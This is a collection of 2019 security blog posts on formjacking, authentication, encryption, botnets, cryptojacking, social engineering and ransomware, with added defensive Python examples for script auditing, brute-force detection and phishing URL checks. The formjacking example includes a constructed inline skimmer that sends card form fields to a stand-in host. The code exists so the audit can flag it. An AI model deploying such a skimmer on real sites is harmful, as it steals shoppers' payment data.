In 2018, threat actors used malicious JavaScript to steal victims' payment information, such as credit and debit card details, from numerous eCommerce web sites. The number of cases and the rate at which formjacking was rising that year put it ahead of clickjacking and even ransomware. Around 4,800 web sites were compromised with formjacking code every month in 2018, which has caused many companies to rethink the design of their web applications. Around 3.7 million formjacking attacks were blocked that year, one-third of them during the holiday shopping season.
The usual victims of formjacking are small and medium-sized firms, but big companies are not out of the risk either; Ticketmaster and British Airways both fell prey to attackers using formjacking to steal payment information. In the Ticketmaster breach, around 40,000 of its customers in the UK were affected. The attackers compromised the chatbot of one of Ticketmaster's partners and from there injected malicious JavaScript into Ticketmaster's web site, which allowed them to steal victims' information. In the British Airways breach, the attackers used a similar method, together with fake web domains and servers, to orchestrate an attack that affected 380,000 customers.
This is a type of attack everyone should try to keep themselves safe from, as it is very hard to detect.
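Shoppers cannot detect formjacking, but site operators can make it much harder, and the Ticketmaster case shows where to look: a third-party script loaded into the checkout page without any integrity check. The following is an added example (not code from the original post) of a static audit of the <script> tags on a checkout page, together with a helper that computes Subresource Integrity (SRI) digests, a browser feature the post does not mention. The audit flags external scripts from origins not on an allow-list, external scripts without an integrity attribute, and any inline script on the payment page. The sample page, the domains and the digest value in it are constructed for this example and do not come from any real site.

```python
"""Added example: checkout-page <script> audit and SRI digest helper.

The HTML, domains and integrity value below are constructed for illustration only.
"""
import base64
import hashlib
import hmac
import re
from urllib.parse import urlsplit

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""\b(src|integrity)\s*=\s*["']([^"']*)["']""", re.IGNORECASE)


def sri_digest(body: bytes, algo: str = "sha384") -> str:
    """Value for a <script integrity="..."> attribute: '<algo>-<base64 of the digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def integrity_matches(body: bytes, integrity: str) -> bool:
    """Re-check a fetched script body against the integrity value the page declares."""
    algo, _, _ = integrity.partition("-")
    return hmac.compare_digest(sri_digest(body, algo), integrity)


def extract_scripts(html: str) -> list:
    """One dict per <script> tag: src, integrity and inline body (regex-based; fine for an audit script)."""
    scripts = []
    for attrs, inline in SCRIPT_RE.findall(html):
        found = {name.lower(): value for name, value in ATTR_RE.findall(attrs)}
        scripts.append({"src": found.get("src"), "integrity": found.get("integrity"), "inline": inline.strip()})
    return scripts


def audit_checkout_page(html: str, allowed_origins) -> list:
    """Return (finding, detail) pairs for anything on the page a formjacking attack could hide in."""
    findings = []
    for script in extract_scripts(html):
        if script["src"] is None:
            findings.append(("inline-script", script["inline"][:40]))
            continue
        parts = urlsplit(script["src"])
        # Relative URLs are same-origin; everything else is keyed by scheme://host.
        origin = f"{parts.scheme or 'https'}://{parts.netloc}" if parts.netloc else "self"
        if origin not in allowed_origins:
            findings.append(("unexpected-origin", script["src"]))
        if not script["integrity"]:
            findings.append(("missing-integrity", script["src"]))
    return findings


# Constructed sample checkout page: a first-party script with SRI, a third-party chat widget pulled in
# without SRI (the pattern seen in the Ticketmaster case), and an inline skimmer of the kind formjacking injects.
CHECKOUT_HTML = """
<form id="payment"><input name="card"><input name="cvv"><button>Pay</button></form>
<script src="/static/checkout.js" integrity="sha384-constructedDigestValueForTheExample"></script>
<script src="https://chat.partner.example/widget.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function (e) {
  navigator.sendBeacon('https://collector.example/c', new FormData(e.target));
});
</script>
"""
ALLOWED_ORIGINS = {"self", "https://cdn.shop.example"}

if __name__ == "__main__":
    for finding in audit_checkout_page(CHECKOUT_HTML, ALLOWED_ORIGINS):
        print(*finding)
```

Two caveats. SRI only helps for scripts whose content you control or pin; a third-party widget that updates itself will simply stop loading once its digest changes, which is the right failure mode for a payment page but has to be planned for. And neither SRI nor this audit helps if the merchant's own server is compromised, since the attacker then edits the page, and its integrity attributes, directly; that case needs integrity monitoring of the deployed files themselves.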

Read More

25

March, 2019

Privacy and Anonymity

In today's world, where cybercrime is happening everywhere and important and private data is being stolen by cyber criminals, it has become necessary to protect one's personal information. ... In this blog, we discuss how important privacy and anonymity have become in modern times, online and offline.
Privacy is the right to reveal a given piece of information about oneself only to the entities one chooses. In other words, the person sharing the information has the right to share only what they wish to share, and to decide with whom they share it. Privacy applies both online and offline. Offline, a person has the right to control what information is collected about them while interacting with others, when handing their personal documents to someone in person, or when going about other private matters, and how that information is used. The same goes for online privacy; the difference is that all the information being handled is digital. Online privacy pertains to all the information collected and used via online means, such as information collected by social media websites. Privacy should be taken very seriously because if an attacker manages to steal a victim's private information, they can use it for their own gain. For example, if a threat actor somehow steals a victim's private photos, which would cause embarrassment if shared elsewhere, the attacker can use that opportunity to blackmail the victim for money. Even your Internet Service Provider (ISP) may collect and sell your data to, for example, an advertising company, which may then invade your privacy by spamming you with advertisements.
Anonymity, on the other hand, concerns the identity of a person. Being anonymous means hiding one's identity while interacting with another entity. For example, when sending messages online, one could create a profile with a fake name or no name at all. This comes in handy especially on websites where someone might be watching or trying to gather information about others. If the user is anonymous on the site, the attacker's chances of identifying a victim are reduced considerably, and if the attacker cannot identify the victim, then even information they have stolen may be of no use to them. For example, if an attacker intercepts a private message that contains a password but there is no identifying information in the message or about the sender or the receiver, the attacker may have no use for that password, since they won't know where it applies. Hence, remaining anonymous online has become a useful practice while surfing the internet, as adversaries lurk in search of victims' personal information.
Some get confused when privacy and anonymity are discussed together, but privacy is concerned with content, such as the contents of a message, whereas anonymity is concerned with the identity of a user, such as the sender of the message.
Just as a coin has two faces, there is an inevitable dark side to privacy and anonymity. Just like regular users have the right to be private, so do attackers, who also use techniques to be private and anonymous on the web and offline. This can cause trouble for victims who fall prey to these criminals. Take the example of chat rooms that allow people to talk to each other anonymously and make new friends. Numerous people use them, and if an adversary is also using that service, they can try to lure people into giving away private information by talking to them via the chat room. Attackers use clever techniques to steal information, and by the time the victim realises what has happened, the attacker is long gone, and the victim won't even know whom they were talking to. So be careful what you share and where you introduce yourself.

Read More

23

March, 2019

Authentication

Access Granted! Access Granted! ... You wouldn't want that alert to pop-up when a threat actor is trying to access your facilities, network or systems. This blog discusses the ways authentication methods can be used to prevent adversaries from gaining access to critical infrastructure and sensitive information.
Authentication is a way of making sure that any given entity is actually who they say they are. For example, it is a way of making sure whether it is really Alice who is checking-in to a flight by validating his identification documents. Another example of this is making sure that it is actually Bob who is signing in to his workstation or not by confirming his credentials. There are multiple different methods of authentication that can be used to verify and authenticate an entity. In one form of authentication a credible person, first verifies whether an entity is genuine and if it is genuine then that proof of the entity's genuineness can be accepted by others to authenticate that particular entity. Examples of such verification processes are the key-signing parties that are held regularly among the GNU Privacy Guard and PGP communities, where people sign each other's public keys. In another form of an authentication process, whether someone would be granted access to certain entities depends on the documentation or other external confirmations. For example, if a user uses credentials to access secure systems and those credentials are authentic, it is only then that they will be granted access to those systems. Authentication can be used for many purposes, which include authenticating to one's workstation, a web site account, Wi-Fi access point, bank account, an ATM machine, etc. Several factors of authentication exist that can be used for these purposes.
The most widely used authentication factors are something you know, something you have, something you are, somewhere you are and something you do. In the first type of factor, the user memorises a password or a PIN that they enter whenever asked. Using a simple password or PIN is not a good idea, as they can be easily cracked using simple techniques, such as guessing, so it is recommended to use complex passwords. In the second type of factor, the user possesses something tangible, for example a smart card, to authenticate to a secure facility or system. Smart cards can, however, be stolen or lost, and this can cause trouble for the victim: they might lose their access to critical systems, or if an attacker has their smart card, the attacker can impersonate the victim and perform malicious activities under their identity. The third type of factor deals with the physical characteristics of the user's body, such as fingerprints. This factor is tough for an attacker to copy, as it is hard to steal someone's body parts or make a copy of them. In the fourth factor, authentication depends on the geographical location the user is at. If they are at a place they have not authenticated from before, the system they are trying to access may reject their request. This also means that if an attacker attempts to gain access to someone's account from a location far away from the legitimate user's usual sign-in location, the attacker may be blocked from accessing the account. The fifth factor deals with the way a user performs an action: the way they type on a keyboard, perform gestures, or their touch patterns.
In general, if only one of these factors is used, it is called single-factor authentication; if two factors are used, it is called two-factor authentication; and when more than two factors are used in conjunction with each other, it is referred to as multi-factor authentication.
An example of an authentication attack is a brute force attack, in which a threat actor uses computing power to attack the "something you know" factor and guess a user's password, username, a cryptographic key, or credit card numbers. This type of attack is an automated trial-and-error process that tries to authenticate to a system by inputting a specific value and then checking whether it works. If it works, the attacker may gain access to the system; if the value is incorrect, the attacker tries the next value. This is performed using automated tools, which makes it an easy process for the attacker, especially if the user has chosen weak credentials. Single-factor authentication has been proven to be insecure, as attackers are getting cleverer each day. Therefore, authentication methods should be chosen wisely.
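From the defender's side, the trial-and-error pattern described above is visible in the authentication log as a burst of failed logins for one account from one source, often followed by a success. The following Python script is an added example (not code from the original post) of a small detector for that pattern; the log format, the sample lines and the thresholds are constructed for the example and would need to match whatever your own systems emit.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample authentication log (not from any real system).
LOG_LINES = [
    "2019-03-23T10:00:01Z user=alice src=203.0.113.7 result=FAIL",
    "2019-03-23T10:00:04Z user=alice src=203.0.113.7 result=FAIL",
    "2019-03-23T10:00:07Z user=alice src=203.0.113.7 result=FAIL",
    "2019-03-23T10:00:10Z user=alice src=203.0.113.7 result=FAIL",
    "2019-03-23T10:00:13Z user=alice src=203.0.113.7 result=FAIL",
    "2019-03-23T10:00:16Z user=alice src=203.0.113.7 result=FAIL",
    "2019-03-23T10:00:19Z user=alice src=203.0.113.7 result=SUCCESS",
    "2019-03-23T10:05:00Z user=bob src=198.51.100.5 result=FAIL",
    "2019-03-23T10:05:20Z user=bob src=198.51.100.5 result=SUCCESS",
    "this line is not a login record and is skipped",
]

# Assumed log line layout: "<ISO timestamp> user=<name> src=<ip> result=SUCCESS|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>SUCCESS|FAIL)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "user": m["user"],
        "src": m["src"],
        "result": m["result"],
    }


def detect_brute_force(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window detector: alert once when a (source IP, username) pair
    accumulates `threshold` failures inside `window`, and raise a second,
    higher-priority alert if that pair then logs in successfully."""
    recent = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerted = set()               # pairs that already triggered a burst alert
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["src"], ev["user"])
        if ev["result"] == "FAIL":
            q = recent[key]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({"kind": "burst", "src": ev["src"], "user": ev["user"],
                               "failures": len(q), "first": q[0], "last": ev["ts"]})
        elif key in alerted:
            # A success right after a burst is the case worth escalating first.
            alerts.append({"kind": "success_after_burst", "src": ev["src"],
                           "user": ev["user"], "at": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_brute_force(LOG_LINES):
        print(alert)
```

With the constructed log, alice's six failures in fifteen seconds trigger a burst alert on the fifth failure and the following success is escalated, while bob's single mistyped password is ignored. Counting per source and account, rather than per account alone, keeps one attacker from locking legitimate users out by hammering their usernames.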


22

March, 2019

Encryption in current threat landscape

This world is full of things that are either good or bad for us. There also exist things that could be good and bad, good for one while bad for someone else. ... This blog discusses how encryption could have advantages as well as disadvantages in the current threat environment.
Encryption is a cryptographic process that converts text in a human-readable form into a format that is impossible for humans to understand without the use of specific cryptanalysis techniques. Encryption has been around since ancient times. The Caesar cipher is an ancient encryption technique that is very simple and was used widely. It is based on the substitution technique, in which each letter is replaced by another letter that is a fixed number of positions away from it in the English alphabet. A substitution cipher is easy to crack, and so is the Caesar cipher. Ancient people created encryption techniques because they wanted to keep the messages they sent to someone secret.
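To make the "easy to crack" claim concrete, here is an added Python example (not from the original post) that implements the Caesar cipher and then recovers the key by exhaustive search: there are only 25 non-trivial shifts, so an attacker does not need the key at all. The small English word list used to rank candidates and the sample message are assumptions made for the example.

```python
# Constructed word list used to score candidate plaintexts (assumption for the demo).
COMMON_WORDS = {"the", "and", "at", "me", "meet", "old", "key", "dawn",
                "bring", "mill", "to", "of", "in", "is", "it", "you", "on", "for"}


def caesar_shift(text, shift):
    """Shift every letter `shift` positions along the alphabet, preserving case.
    Non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr(base + (ord(ch) - base + shift) % 26))
        else:
            out.append(ch)
    return "".join(out)


def caesar_encrypt(plaintext, key):
    return caesar_shift(plaintext, key % 26)


def caesar_decrypt(ciphertext, key):
    return caesar_shift(ciphertext, -key % 26)


def english_word_score(text):
    """Count how many whitespace-separated words of `text` are known English words."""
    cleaned = "".join(c if c.isalpha() or c.isspace() else " " for c in text.lower())
    return sum(1 for word in cleaned.split() if word in COMMON_WORDS)


def break_caesar(ciphertext):
    """Exhaustive key search: decrypt under every shift and keep the most English-looking result.
    Returns (key, plaintext)."""
    best_key, best_plain, best_score = 0, ciphertext, -1
    for key in range(1, 26):
        candidate = caesar_decrypt(ciphertext, key)
        score = english_word_score(candidate)
        if score > best_score:
            best_key, best_plain, best_score = key, candidate, score
    return best_key, best_plain


if __name__ == "__main__":
    message = "Meet me at the old mill at dawn and bring the key"   # constructed sample
    secret = caesar_encrypt(message, 3)
    print("ciphertext:", secret)
    print("recovered :", break_caesar(secret))
```

The key space is so small that scoring candidates by a handful of dictionary words is enough; for longer texts, letter-frequency analysis would do the same job without any word list. The lesson carries over to modern ciphers: security has to rest on the size of the key space and the strength of the algorithm, never on the secrecy of the method.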
Mainly, there are two types of encryption methods: symmetric encryption and asymmetric encryption. In symmetric encryption, or private-key encryption, a single key is used for both encrypting and decrypting a message. It is called a secret key, which is why symmetric encryption is also sometimes referred to as secret-key encryption. In this type of encryption, before sending a message, the sender uses a symmetric encryption algorithm and the secret key to convert the plaintext message into unintelligible ciphertext and then sends the ciphertext to the receiver. The sender and the receiver share the secret key, and the receiver uses that secret key to convert the ciphertext back into the human-readable plaintext message. In asymmetric encryption, or public-key encryption, the sender and receiver use a pair of keys consisting of a public key and a private key. The person who wants to send a message uses the receiver's public key to encrypt the plaintext before sending it. After receiving the ciphertext, the receiver uses their own private key to decrypt it. In general, whoever wants to send an encrypted message has to have the public key of the receiver, and the receiver must have access to their own private key.
Keeping the keys private and protected is a crucial task when using encryption, because if any of the keys is lost, a lot of damage can be caused. This can happen if an attacker manages to obtain the lost keys and eventually gains access to the confidential data. Losses can also occur if an organisation encrypts its data, loses the decryption keys and has kept no backups: the encrypted data may then be lost forever, as it cannot be decrypted without the decryption keys, and this may cause considerable losses to the organisation.
There is one more way in which encryption can be used, and that is hashing. Hashing is a form of one-way encryption in which a hashing algorithm is applied to a piece of data to generate a character string, called a hash value or simply a hash. The hash value can be used for integrity verification of data and remains unchanged as long as the data is not changed from its original form. If even a single bit of the data changes, the hash value changes as well. Therefore, it is considered that no two pieces of data can have the same hash. However, exceptions exist where two different inputs have been found to produce the same hash value (a collision). Many different hashing algorithms exist, which generate hashes of varying complexity and length. Encryption can be performed on data at rest and data in transit.
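The single-bit property is easy to see in practice. The following Python snippet is an added example (not from the original post) that hashes a constructed document with SHA-256, flips one bit of it, and shows that the stored digest no longer verifies and that roughly half the digest bits have changed. The sample invoice text is constructed for the example.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex digest of SHA-256 over the given bytes."""
    return hashlib.sha256(data).hexdigest()


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Return a copy of `data` with one bit toggled.
    Bit 0 is the least significant bit of byte 0."""
    buf = bytearray(data)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(buf)


def verify_integrity(data: bytes, expected_hex: str) -> bool:
    """Recompute the digest and compare it to the stored value in constant time,
    so the comparison itself does not leak how many leading characters matched."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def differing_bits(hex_a: str, hex_b: str) -> int:
    """Hamming distance between two hex digests of the same length."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


# Constructed sample document and the digest a verifier would have stored for it.
ORIGINAL = b"Invoice 1042: pay 250.00 to account 12345678"
STORED_DIGEST = sha256_hex(ORIGINAL)


def demo():
    """Show that a one-bit change breaks verification and scrambles the digest."""
    tampered = flip_bit(ORIGINAL, 0)          # 'I' (0x49) becomes 'H' (0x48)
    return {
        "original_ok": verify_integrity(ORIGINAL, STORED_DIGEST),
        "tampered_ok": verify_integrity(tampered, STORED_DIGEST),
        "bits_changed": differing_bits(STORED_DIGEST, sha256_hex(tampered)),
    }


if __name__ == "__main__":
    print(demo())
```

Note that a plain hash only detects accidental or unauthenticated modification: anyone who can rewrite the data can recompute the digest too. When the stored digest itself is reachable by the attacker, use an HMAC with a secret key or a digital signature instead, which is the same `hmac` module used above for the constant-time comparison.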
Organisations use encryption to keep their data confidential and safe from snooping eyes. They apply solutions to protect data at rest, such as full-disk encryption software that encrypts the hard drives of all the systems that hold sensitive information. Solutions such as encrypted communication channels protect data in transit. An example is the SSL or TLS tunnel over the client-server communication channel between a web server and a user's web browser. Encryption can also be used to encrypt people's emails. While these are some of the good ways encryption is used, there are some evil ways it is being used as well. One significant example is encryption malware, such as ransomware. Threat actors use ransomware to encrypt victims' hard drives, files, folders, etc., on both desktop and mobile platforms. There have been cases where ransomware attacks caused organisations to suffer millions of dollars in losses. One example is the NotPetya ransomware attack suffered by Merck. NotPetya cost Merck about $135 million in sales and $175 million in other costs.
Hence, encryption can be used for both legal and illegal purposes. People created encryption and use it to keep information confidential, but attackers use it to encrypt people's data and cause them trouble.


20

March, 2019

Herding bots into botnets

Ever met someone who was wondering how they used up so much of their internet data, or been in such a situation yourself? ... The reason might not be the usual "a lot of surfing and downloading caused it"; it could be something you have no idea about. It could be that your device has become part of a botnet, which we will discuss in this blog.
You might be wondering what a botnet is. In simple words, a botnet is a network of bots created to perform a specific task repetitively. It is also sometimes referred to as a zombie network. Bots are devices such as a computer, a mobile device, an IoT device, or any other type of device that can connect to the Internet. Botnets can be used for legal or illegal purposes. Legal purposes can include performing tasks that help keep a website running; this type of botnet is not a danger to society. The botnets everyone should be afraid of are the ones attackers create to perform illegal activities. Threat actors compromise devices using malware and add those compromised devices to their botnet. They grow the botnet by compromising more and more devices, using the botnet itself, until they have gathered enough bots to perform the actual attack for which they created the botnet. The attackers compromise systems via a drive-by download or by tricking a victim into installing malware, such as a Trojan horse, on their computer. After the malware is installed, the newly created bot connects back to the computer that acts as the controller of the botnet; the controller lets the attacker know that the bot is online and ready to follow instructions, and in this way the compromised device comes under the full control of the botnet owner. This is how a botnet is created and grows in size.
There are mainly two botnet architectures: the client-server model and the peer-to-peer model. The client-server model is the one discussed above, in which a central server controls the bots connected to it. The botnet owner sends commands to the botnet server, also referred to as the command and control server (C&C server), which forwards those commands to the bots, and the bots then perform the tasks the botnet owner wants them to perform. In a peer-to-peer botnet, the botnet owner spreads malware on peer-to-peer networks to create and gather bots. Such peer-to-peer botnets use digital signatures, so only the person who holds the private key can access and control the botnet. The key pairs are generated using public-key cryptography.
The botnet owner uses the botnet to perform evil tasks, such as a distributed denial-of-service (DDoS) attack on websites or any other targets, sending out spam emails, and creating fake internet traffic on a site for financial gain. The attackers can also replace the ads in victims' web browsers and generate pop-up ads that try to fool victims into paying for the removal of the bot from their computers. There are more purposes that adversaries use botnets for, including:

Sniffing the network traffic of millions of users around the globe

Logging keyboard keystrokes (keylogging)

Spreading new malware, such as ransomware

Attacking Internet Relay Chat networks

Manipulating online polls

Manipulating online games

Performing mass identity theft

The botnet owners may also rent out the botnet that they have created to other cybercriminals, or straight up sell the whole botnet to them. The buyer then uses the botnet for their own nefarious purposes.
Botnets can be a considerable problem for critical infrastructure, as they can cause significant or permanent damage to the systems in the environment. This can happen if the attacker sends more traffic than the systems can handle, causing them to overheat due to the intensive use of their resources. A notable example of a very problematic botnet is the Mirai botnet. It is still causing chaos in the wild and was recently upgraded with more exploits than it originally included in its arsenal. It mainly targets IoT devices, such as routers, digital video recorders, smart TVs, and IP cameras. Mirai first appeared in August 2016 and was created by a group of three men who were punished by the court for the damage caused by their malware. These men were even questioned by the FBI for their actions. Threat actors used the Mirai botnet to hit the KrebsOnSecurity website with a massive denial-of-service attack. The attack was reported to have used thousands of devices and caused the website to be down for several days. Hence, protect your computers from becoming zombies and bots: they could become part of a massive botnet performing malicious activities and get you into trouble, because your device would probably be connecting to the target using your IP address, which can be tracked by law enforcement agencies, and they might think you are the culprit behind all the chaos and catch you instead.


19

March, 2019

Cryptojacking and its effects on computing equipment

Ever wondered why your laptop is getting hot and kind of burning your lap? No? Well, you might just want to think it over and find the reason why, as it may not only be a hardware issue.
...In this blog, we will discuss a process that attackers use to mine cryptocurrencies illegitimately using the resources of a user's PC, without the user even getting to know about it.
The process we are talking about is called cryptojacking, and threat actors use various techniques to put this process into play and mine cryptocurrencies. It is also possible that the entities mining cryptocurrencies illegitimately are not actual adversaries but one of the websites the user visits regularly; even these websites could use the resources of the user's computer to mine cryptocurrencies for themselves. Cryptojacking can be done either by installing a program on the victim's computer or just through the web browser without installing any other program, which is even worse. Cryptojacking uses up the Central Processing Unit (CPU) of the victim's computer, slows the system down, and degrades its performance. It even reduces the battery life of the machine. In some cases, the storage space on the computer has also been seen to get used up.
In-browser cryptojacking works by using or injecting JavaScript into a web page to mine for cryptocurrencies. The attackers leverage the fact that JavaScript code does not need to be installed and that it runs on just about every website that exists to mine cryptocurrencies with the victim's computer. The victim does not need to install the code, execute it themselves, or even opt in to running JavaScript code on their computer; it simply runs on its own. This is very scary, as the victim is not even in control of what is happening on their computer. Monero is a cryptocurrency that supports in-browser cryptojacking. Coinhive was a crypto mining service that attackers had been using for their cryptojacking endeavours. It has been shut down now, but when it was operational it was reported as making about $250,000 per month mining Monero at one point in time, and among all the websites running a cryptocurrency miner, Coinhive had a 62% share. This type of cryptojacking is not limited to the desktop platform; it can also infect Android mobile devices. There was a 4000% rise in Android-based cryptojacking attacks.
The second approach adversaries take to perform cryptojacking is installing crypto mining malware on the victim's computer. They use multiple techniques to make this happen, but the most widely used one is a social engineering attack called phishing. The adversaries use it to lure the victim into clicking a malicious link sent through a phishing email and unwittingly installing the crypto mining malware on their computer. After getting installed, the crypto mining malware runs in the background and keeps mining cryptocurrency without the victim knowing about it. For as long as the victim's computer is turned on, the crypto mining malware keeps mining while using up the precious resources of the victim's computer. It is difficult to detect the infection after the fact, and it is also difficult to detect why the computer's CPU utilisation is so high, because the processes running on the system can be hidden or masked as legitimate processes.
Cryptojacking is a cause for concern, as it can also become the reason for significant physical damage to an organisation's electrical infrastructure, because it can cause extreme overheating of the computing hardware owned by the victim. All this extra usage of computing hardware has been reported to cost organisations electricity bills of over $2,196 per year. Therefore, it is wise to protect yourself against cryptojacking and be on the lookout for any suspicious activity on the systems that you or your company use.


18

March, 2019

Social Engineering- Hacking Human Vulnerabilities

(Tring) (Tring)
Receiver: Hello. Who is this?
Caller: Hi, I am calling from Microsoft. We just got a diagnostics report from your personal computer, and I wanted to tell you that your computer has a virus!
Receiver: Oh God! No wonder it has been working so slowly for the past few days.....
And there we have yet another victim of another cyber-attack, called a social engineering attack. Humans have a lot of vulnerabilities that can be exploited using various social engineering techniques. This blog discusses what social engineering is and the different social engineering techniques that threat actors use to exploit human vulnerabilities.
Humans are social animals, and they have a tendency to be happy when they talk to someone who is willing to help them, and they start trusting that person, who was a stranger two seconds ago, with even their private information. In a social engineering attack, threat actors cleverly exploit these human vulnerabilities of emotion and trust and fool victims into giving away sensitive information without the use of any malware. Mostly, these attacks are widespread, but many times they can be highly targeted. There are many different forms of social engineering attacks, such as phishing, vishing, smishing or SMS phishing, tailgating, baiting, and pretexting.
Phishing is a type of social engineering attack in which a threat actor tries to manipulate the victim into acting hastily by instilling fear, a sense of urgency and threats. Attackers use URL shorteners to redirect victims to websites that might look legitimate but are in reality malicious. They also try to redirect users to a malicious site by embedding links in other websites or in legitimate-looking emails sent to people's inboxes, in order to steal personal information such as the user's login credentials. Scammers using phishing emails as an attack vector craft messages that look as if they come from a genuine person or organisation, informing the user that a security or other incident has taken place, that the user's account is in danger, and that to secure the account they need to go to the URL given in the email and reset their password. Taking the example of an organisation, say a bank: when the user clicks on that link, a website opens that looks exactly like the login screen of the bank's website, and as soon as the unsuspecting user enters their credentials into the username and password fields and clicks the login button, their credentials are stolen and transmitted to the attacker. The user usually does not notice, because after clicking the login button they are redirected to the bank's genuine website, so they are fooled into thinking it might have been an error and that is why they were brought back to the login page. This is how attackers trick unsuspecting users into giving away their personal information.
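The two technical tells in that scenario, shortened links and a host that merely resembles the bank's, can be checked mechanically before a user ever clicks. The Python function below is an added example (not from the original post) that classifies a URL against a list of trusted domains; the trusted domain `examplebank.com`, the shortener list and every sample URL are constructed for the example, and the edit-distance threshold of 2 is a tuning choice, not a standard.

```python
import re
from urllib.parse import urlparse

# Constructed configuration for the example: the organisation's real domains and
# a few well-known shortener hosts whose destination cannot be judged from the link.
TRUSTED_DOMAINS = {"examplebank.com"}
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl"}
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def levenshtein(a: str, b: str) -> int:
    """Edit distance: the number of single-character insertions, deletions or
    substitutions needed to turn `a` into `b`."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_part(host: str) -> str:
    """Last two labels of the host (a simplification: no public-suffix list here)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def classify_url(url: str, trusted=TRUSTED_DOMAINS) -> str:
    """Return one of: invalid, ip_host, shortener, punycode, trusted, lookalike, unknown."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    if not host:
        return "invalid"
    if IPV4_RE.match(host):                       # banks do not link to bare IP addresses
        return "ip_host"
    if host in SHORTENERS:                        # destination hidden behind a redirect
        return "shortener"
    if any(label.startswith("xn--") for label in host.split(".")):
        return "punycode"                         # internationalised label; may mimic Latin letters
    for t in trusted:
        if host == t or host.endswith("." + t):   # genuine domain or one of its subdomains
            return "trusted"
    registrable = registrable_part(host)
    for t in trusted:
        # Trusted name buried inside a longer host ("examplebank.com.evil.example"),
        # or a registrable domain within two edits of the real one ("exarnplebank.com").
        if t in host or levenshtein(registrable, t) <= 2:
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for sample in ["https://www.examplebank.com/login",
                   "https://www.exarnplebank.com/login",
                   "http://examplebank.com.account-verify.example/",
                   "http://bit.ly/3abc"]:
        print(sample, "->", classify_url(sample))
```

A mail gateway or browser extension would treat `lookalike`, `punycode`, `ip_host` and `shortener` as reasons to warn or block, and `unknown` as a prompt for further checks such as domain age or reputation. The registrable-domain heuristic is deliberately simple; production code would consult the public suffix list so that hosts under two-level suffixes such as `.co.uk` are handled correctly.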
Vishing is a type of phishing attack in which attackers use voice calls to lure victims into giving away their personal information, such as credit card details. An attacker could call the victim posing as someone from the victim's bank, telling them that the bank has detected suspicious activity on the victim's credit or debit card account and that the victim should change the PIN for the card over the phone if they want to secure their account. This induces fear in the victim and urges them to follow the attacker's instructions and change the PIN. The attackers ask the victim to tell them all the card details so that they can go ahead and reset the PIN, and as soon as the victim provides the card details, the attackers make unauthorised transactions using the victim's card while still on the phone with the victim. The victim has no clue what just happened, even after the attacker hangs up, and only learns that they were the victim of a vishing attack the next time they check their account details. Smishing, or SMS phishing, is another type of phishing attack in which the attacker uses SMS messages to orchestrate a social engineering attack.
Tailgating is another social engineering attack in which an unauthorised attacker gains access to a target building by following or shadowing a person who is authorised to enter the building. They do so by posing as someone from the maintenance department, a delivery person, etc., and may ask an authorised person to hold the door for them so that they can enter easily. Another type of social engineering attack is baiting, in which an attacker lures the victim into giving away their personal information in exchange for some goods, such as a free mp3 song or a free movie to download. Pretexting is another social engineering attack in which the attacker creates a fake story to steal a victim's personal information. For example, an attacker could claim to be from another branch office of the organisation and fool the security personnel into letting them into the building, and after entering, they could social engineer other personnel and steal sensitive information, manipulate the company's systems or cause other damage.


16

March, 2019

Ransomware causing chaos

(Click) (Click)..Hmm.(Click) (Click) (Dialog box opens) “Ur fil3s h@v3 b33n 3ncrypt3d! U h@v3 2 d@y$ t0 p@y u$ m0n3y 0r $@y G00DBY3 t0 ur fil3s f0r3v3r!”
... Adversaries come up with more and more complex attack techniques each day, and using malware is one of them. Malware is malicious software coded to perform sinful activities on a computer system in an organisation's network infrastructure. In this blog, we will discuss a particular type of malware, called ransomware, and how it managed to penetrate the network of one of the UK's most critical organisations, the National Health Service, and cause chaos.
